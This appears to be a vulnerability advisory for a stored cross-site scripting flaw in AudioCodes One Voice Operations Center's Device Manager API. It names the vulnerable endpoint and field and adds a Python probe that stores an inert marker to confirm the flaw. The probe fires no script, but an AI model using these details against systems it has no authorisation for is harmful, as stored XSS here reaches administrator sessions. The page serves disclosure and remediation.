AudioCodes One Voice Operations Center Cross-Site Scripting Vulnerability
Vulnerability
A cross-site scripting (XSS) vulnerability has been identified in AudioCodes One Voice Operations Center (OVOC) versions prior to 8.4.582. The issue arises from improper input sanitization in the Device Manager API: an attacker who can send an 'Init' request to that API can store JavaScript in it, and the script executes in the browser of a logged-in administrator when the Device Manager landing page is opened. Because the payload persists and fires on a later page load rather than only in the response to the injecting request, this is a stored XSS.
Impact
Exploitation of this vulnerability results in stored cross-site scripting: the injected script runs in the browser of any user who opens the affected landing page, within that user's authenticated session, so it can read what that user can see and issue requests to OVOC as that user. Since the landing page is used by administrators, the realistic target is an administrator session.
Reproduction
To reproduce this vulnerability, send a POST request to the '/rest/v1/ipphoneMgrStatus/init' endpoint of the Device Manager API with a JavaScript payload in the 'userName' field. The value is stored without sanitization; opening the Device Manager landing page afterwards executes the injected script in the viewer's browser. A unique, inert marker (rather than an alert()) is sufficient to confirm the issue and is easier to track in a shared environment, because the test is whether the marker comes back unescaped, not whether a dialog pops.
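The procedure above, as an added probe helper written for this page (it is not AudioCodes code and not part of the original advisory). It stores a unique marker wrapped in angle brackets via the init request, then fetches the landing page and reports whether the marker came back raw (injectable), HTML-encoded (neutralised), or not at all. Assumptions, which the advisory does not state: the init request accepts a JSON body with a "userName" key, the caller already holds an authenticated session cookie, and the landing page path is supplied by the caller.

```python
# Added example: stored-XSS probe for the reproduction steps in this advisory.
# Not AudioCodes code. Assumed (not stated on the page): JSON body with a
# "userName" key, caller-supplied session cookie, caller-supplied landing path.
import json
import secrets
import urllib.request

INIT_PATH = "/rest/v1/ipphoneMgrStatus/init"  # endpoint named in the advisory


def make_marker() -> str:
    """Unique, inert marker; if it comes back unescaped the field is injectable."""
    return "xssprobe" + secrets.token_hex(4)


def probe_value(marker: str) -> str:
    """Wrap the marker in a tag so raw and escaped reflection look different.

    <xssprobe...> is an unknown element and does nothing in a browser, so the
    probe is harmless to other administrators who load the page.
    """
    return f"<{marker}>"


def build_init_body(marker: str) -> bytes:
    """JSON body for the init request (assumed format, see lead-in)."""
    return json.dumps({"userName": probe_value(marker)}).encode("utf-8")


def classify_reflection(page: str, marker: str) -> str:
    """Classify how the fetched landing page reflects the probe.

    'unescaped': the raw tag survived, i.e. the XSS condition holds.
    'escaped':   the marker is present but the brackets were encoded or
                 stripped (e.g. &lt;xssprobe...&gt;), so the sink is safe.
    'absent':    the value was not rendered on this page at all.
    """
    if probe_value(marker) in page:
        return "unescaped"
    if marker in page:
        return "escaped"
    return "absent"


def run_probe(base_url: str, cookie: str, landing_page_path: str) -> str:
    """Send the init request, then fetch the landing page and classify it."""
    marker = make_marker()
    init_req = urllib.request.Request(
        base_url.rstrip("/") + INIT_PATH,
        data=build_init_body(marker),
        method="POST",
        headers={"Content-Type": "application/json", "Cookie": cookie},
    )
    with urllib.request.urlopen(init_req, timeout=10) as resp:
        resp.read()  # body not needed; the payload is now stored server-side
    page_req = urllib.request.Request(
        base_url.rstrip("/") + landing_page_path,
        headers={"Cookie": cookie},
    )
    with urllib.request.urlopen(page_req, timeout=10) as resp:
        page = resp.read().decode("utf-8", errors="replace")
    return classify_reflection(page, marker)


if __name__ == "__main__":
    import sys
    # usage: python probe.py https://ovoc.example "JSESSIONID=..." /landing/path
    print(run_probe(sys.argv[1], sys.argv[2], sys.argv[3]))
```

An 'unescaped' result shows the value reaches the page without HTML encoding; confirm in a browser before reporting, since a value reflected inside a JavaScript string or attribute needs a different payload shape than a bare tag. Run the probe only against systems you are authorised to test, and note that the marker stays stored until the field is overwritten.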
Remediation
Users are advised to update AudioCodes One Voice Operations Center to version 8.4.582 or later, which sanitizes the affected input.
